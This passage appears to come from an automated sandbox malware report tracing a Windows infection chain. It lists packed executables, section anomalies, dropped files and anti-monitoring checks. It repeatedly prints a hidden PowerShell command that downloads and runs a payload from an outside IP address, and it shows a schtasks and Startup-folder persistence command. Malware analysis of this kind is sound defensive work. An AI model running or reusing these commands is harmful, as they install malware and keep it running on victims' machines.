                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 25.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 27.2.rapes.exe.30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
                                    Source: mAtJWNv[1].exe.14.dr, Ce716WgjPJi1to0DwO.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{lMyWdMdzSHL952Z0EGd(typeof(IntPtr).TypeHandle),lMyWdMdzSHL952Z0EGd(typeof(Type).TypeHandle)})
                                    Source: mAtJWNv.exe.14.dr, Ce716WgjPJi1to0DwO.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{lMyWdMdzSHL952Z0EGd(typeof(IntPtr).TypeHandle),lMyWdMdzSHL952Z0EGd(typeof(Type).TypeHandle)})
                                    Source: mAtJWNv[1].exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs .Net Code: NA4BaGdVL2
                                    Source: mAtJWNv[1].exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs .Net Code: D0mHsQPh9h
                                    Source: mAtJWNv.exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs .Net Code: NA4BaGdVL2
                                    Source: mAtJWNv.exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs .Net Code: D0mHsQPh9h
                                    Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: V0Bt74c[1].exe.14.dr Static PE information: 0xADFF511F [Mon Jul 3 22:20:15 2062 UTC]
                                    Source: C:\Users\user\Desktop\random.exe Code function: 0_2_004242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004242DE
                                    Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                                    Source: rapes.exe.11.dr Static PE information: real checksum: 0x1e3d54 should be: 0x1e65ec
                                    Source: yUI6F6C.exe.14.dr Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
                                    Source: zY9sqWs[1].exe.14.dr Static PE information: real checksum: 0x0 should be: 0x78f31
                                    Source: V0Bt74c[1].exe.14.dr Static PE information: real checksum: 0x0 should be: 0x5f210
                                    Source: ADFoyxP.exe.14.dr Static PE information: real checksum: 0x381fe3 should be: 0x3875ef
                                    Source: ReK7Ewx.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x14350a
                                    Source: V0Bt74c.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x5f210
                                    Source: CgmaT61.exe.14.dr Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
                                    Source: zY9sqWs.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x78f31
                                    Source: ReK7Ewx[1].exe.14.dr Static PE information: real checksum: 0x0 should be: 0x14350a
                                    Source: ADFoyxP[1].exe.14.dr Static PE information: real checksum: 0x381fe3 should be: 0x3875ef
                                    Source: PfOHmro[1].exe.14.dr Static PE information: real checksum: 0x0 should be: 0x202bf
                                    Source: CgmaT61[1].exe.14.dr Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb
                                    Source: PfOHmro.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x202bf
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: real checksum: 0x1e3d54 should be: 0x1e65ec
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: section name:
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: section name: .idata
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: section name:
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: section name: zmpqmbag
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: section name: jncfbsbi
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: section name: .taggant
                                    Source: rapes.exe.11.dr Static PE information: section name:
                                    Source: rapes.exe.11.dr Static PE information: section name: .idata
                                    Source: rapes.exe.11.dr Static PE information: section name:
                                    Source: rapes.exe.11.dr Static PE information: section name: zmpqmbag
                                    Source: rapes.exe.11.dr Static PE information: section name: jncfbsbi
                                    Source: rapes.exe.11.dr Static PE information: section name: .taggant
                                    Source: V0Bt74c[1].exe.14.dr Static PE information: section name: .CSS
                                    Source: V0Bt74c.exe.14.dr Static PE information: section name: .CSS
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: section name:
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: section name: .idata
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: section name:
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: section name: mzhehwmc
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: section name: roelxloa
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: section name: .taggant
                                    Source: yUI6F6C.exe.14.dr Static PE information: section name:
                                    Source: yUI6F6C.exe.14.dr Static PE information: section name: .idata
                                    Source: yUI6F6C.exe.14.dr Static PE information: section name:
                                    Source: yUI6F6C.exe.14.dr Static PE information: section name: mzhehwmc
                                    Source: yUI6F6C.exe.14.dr Static PE information: section name: roelxloa
                                    Source: yUI6F6C.exe.14.dr Static PE information: section name: .taggant
                                    Source: CgmaT61[1].exe.14.dr Static PE information: section name:
                                    Source: CgmaT61[1].exe.14.dr Static PE information: section name: .idata
                                    Source: CgmaT61[1].exe.14.dr Static PE information: section name:
                                    Source: CgmaT61[1].exe.14.dr Static PE information: section name: mzhehwmc
                                    Source: CgmaT61[1].exe.14.dr Static PE information: section name: roelxloa
                                    Source: CgmaT61[1].exe.14.dr Static PE information: section name: .taggant
                                    Source: CgmaT61.exe.14.dr Static PE information: section name:
                                    Source: CgmaT61.exe.14.dr Static PE information: section name: .idata
                                    Source: CgmaT61.exe.14.dr Static PE information: section name:
                                    Source: CgmaT61.exe.14.dr Static PE information: section name: mzhehwmc
                                    Source: CgmaT61.exe.14.dr Static PE information: section name: roelxloa
                                    Source: CgmaT61.exe.14.dr Static PE information: section name: .taggant
                                    Source: mAtJWNv[1].exe.14.dr Static PE information: section name: .css
                                    Source: mAtJWNv.exe.14.dr Static PE information: section name: .css
                                    Source: PfOHmro[1].exe.14.dr Static PE information: section name: .CSS
                                    Source: PfOHmro.exe.14.dr Static PE information: section name: .CSS
                                    Source: C:\Users\user\Desktop\random.exe Code function: 0_2_00440A76 push ecx; ret 0_2_00440A89
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_000A359F push ecx; mov dword ptr [esp], 69502F73h 13_1_000A4323
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 0805FA11h; mov dword ptr [esp], edx 13_1_0021CC50
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 1C771B66h; mov dword ptr [esp], eax 13_1_0021CC67
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ebx; mov dword ptr [esp], 00207EB7h 13_1_0021CD5C
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 0F1C6EF5h; mov dword ptr [esp], eax 13_1_0021CDAA
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push eax; mov dword ptr [esp], edi 13_1_0021CE2E
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 412935C5h; mov dword ptr [esp], edx 13_1_0021CEB1
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ecx; mov dword ptr [esp], esi 13_1_0021CEBA
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 7C7D4E27h; mov dword ptr [esp], ecx 13_1_0021CED8
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ecx; mov dword ptr [esp], eax 13_1_0021CF1D
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push esi; mov dword ptr [esp], 6EFBACB7h 13_1_0021CF5A
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 721AE353h; mov dword ptr [esp], esi 13_1_0021CF8C
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ecx; mov dword ptr [esp], edx 13_1_0021CFDA
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push edx; mov dword ptr [esp], esi 13_1_0021D034
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push esi; mov dword ptr [esp], edx 13_1_0021D087
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ebx; mov dword ptr [esp], edx 13_1_0021D0A0
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push edx; mov dword ptr [esp], edi 13_1_0021D12F
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ebp; mov dword ptr [esp], ecx 13_1_0021D182
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 28ECE369h; mov dword ptr [esp], edi 13_1_0021D18B
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push edi; mov dword ptr [esp], ebx 13_1_0021D1F1
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ecx; mov dword ptr [esp], eax 13_1_0021D21D
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 597DE88Dh; mov dword ptr [esp], ebp 13_1_0021D25B
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ebx; mov dword ptr [esp], esi 13_1_0021D308
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 24AE1FB3h; mov dword ptr [esp], ebx 13_1_0021D327
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ebx; mov dword ptr [esp], ebp 13_1_0021D385
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 4B80EA00h; mov dword ptr [esp], ebx 13_1_0021D439
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push eax; mov dword ptr [esp], 65C85347h 13_1_0021D455
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push ebp; mov dword ptr [esp], 68CF75F2h 13_1_0021D4D7
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 732395FEh; mov dword ptr [esp], eax 13_1_0021D544
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Code function: 13_1_0021CC24 push 26A4CF86h; mov dword ptr [esp], edx 13_1_0021D607
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: section name: entropy: 7.9846762099294
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr Static PE information: section name: zmpqmbag entropy: 7.952831791896438
                                    Source: rapes.exe.11.dr Static PE information: section name: entropy: 7.9846762099294
                                    Source: rapes.exe.11.dr Static PE information: section name: zmpqmbag entropy: 7.952831791896438
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: section name: entropy: 7.169833059547756
                                    Source: yUI6F6C[1].exe.14.dr Static PE information: section name: mzhehwmc entropy: 7.953537250716954
                                    Source: yUI6F6C.exe.14.dr Static PE information: section name: entropy: 7.169833059547756
                                    Source: yUI6F6C.exe.14.dr Static PE information: section name: mzhehwmc entropy: 7.953537250716954
                                    Source: CgmaT61[1].exe.14.dr Static PE information: section name: entropy: 7.169833059547756
                                    Source: CgmaT61[1].exe.14.dr Static PE information: section name: mzhehwmc entropy: 7.953537250716954
                                    Source: CgmaT61.exe.14.dr Static PE information: section name: entropy: 7.169833059547756
                                    Source: CgmaT61.exe.14.dr Static PE information: section name: mzhehwmc entropy: 7.953537250716954
                                    Source: mAtJWNv[1].exe.14.dr, Ce716WgjPJi1to0DwO.cs High entropy of concatenated method names: 'eGZi6juOTvHuM3AqcMT', 'QImVx8u9prVJ6Q5ZhQE', 'xb8D5o8ice', 'fJWJrPuWkv2n2wknEjv', 'uGltkNu6BSessyYBViZ', 'C12RuXuxuWYaGcE7Doo', 'KO2BOSuQ5hwVCjxjiju', 'zgeLtquCOOSgYpfX44p', 'gjwjUouM8jUopDwUTXY', 'l52Wk9u0T44L3mo9PjS'
                                    Source: mAtJWNv[1].exe.14.dr, gCnUgIvQu4UM8Qqkpr.cs High entropy of concatenated method names: 'WKqgG71Jxr', 'GjNGI3dLvTpx0QRqhsw', 'jtT0jOdcN9fvs9pFR08', 'rRv5uvdqXA0lhjq3uIo', 'skpWCGdM30wyvKEnUVd', 'iBhaNId0SrTCk4ETfBw', 'b6ZCYEdG35m0wuZYCm6', 'BOeTaHdyC6WjDBnT867', 'CJ56DkdKD03B6aTUjsf'
                                    Source: mAtJWNv[1].exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs High entropy of concatenated method names: 'oOrTcWmPb5', 'NH0TqtpkSe', 'omwTGnVxjh', 'iGWTyYs8lA', 'lU4TKZlNmh', 'e5STIWmrST', 'YeYTRC9Ljo', 'kQvXZ7gBkT', 'iOITUqHIfj', 'Fh4T2okLG1'
                                    Source: mAtJWNv.exe.14.dr, Ce716WgjPJi1to0DwO.cs High entropy of concatenated method names: 'eGZi6juOTvHuM3AqcMT', 'QImVx8u9prVJ6Q5ZhQE', 'xb8D5o8ice', 'fJWJrPuWkv2n2wknEjv', 'uGltkNu6BSessyYBViZ', 'C12RuXuxuWYaGcE7Doo', 'KO2BOSuQ5hwVCjxjiju', 'zgeLtquCOOSgYpfX44p', 'gjwjUouM8jUopDwUTXY', 'l52Wk9u0T44L3mo9PjS'
                                    Source: mAtJWNv.exe.14.dr, gCnUgIvQu4UM8Qqkpr.cs High entropy of concatenated method names: 'WKqgG71Jxr', 'GjNGI3dLvTpx0QRqhsw', 'jtT0jOdcN9fvs9pFR08', 'rRv5uvdqXA0lhjq3uIo', 'skpWCGdM30wyvKEnUVd', 'iBhaNId0SrTCk4ETfBw', 'b6ZCYEdG35m0wuZYCm6', 'BOeTaHdyC6WjDBnT867', 'CJ56DkdKD03B6aTUjsf'
                                    Source: mAtJWNv.exe.14.dr, RhN4VuXG0bkU6RkQbjv.cs High entropy of concatenated method names: 'oOrTcWmPb5', 'NH0TqtpkSe', 'omwTGnVxjh', 'iGWTyYs8lA', 'lU4TKZlNmh', 'e5STIWmrST', 'YeYTRC9Ljo', 'kQvXZ7gBkT', 'iOITUqHIfj', 'Fh4T2okLG1'

                                    Persistence and Installation Behavior

                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com File created: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com
                                    Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com
                                    Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\CgmaT61[1].exe
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ADFoyxP[1].exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yUI6F6C[1].exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ReK7Ewx[1].exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10141790101\ADFoyxP.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\V0Bt74c[1].exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com File created: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe

                                    Boot Survival

                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Window searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Window searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE Window searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: FilemonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: PROCMON_WINDOW_CLASS
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: RegmonClass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Window searched: window name: Filemonclass
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
                                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0043F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0043F98E
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004B1C41
                                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
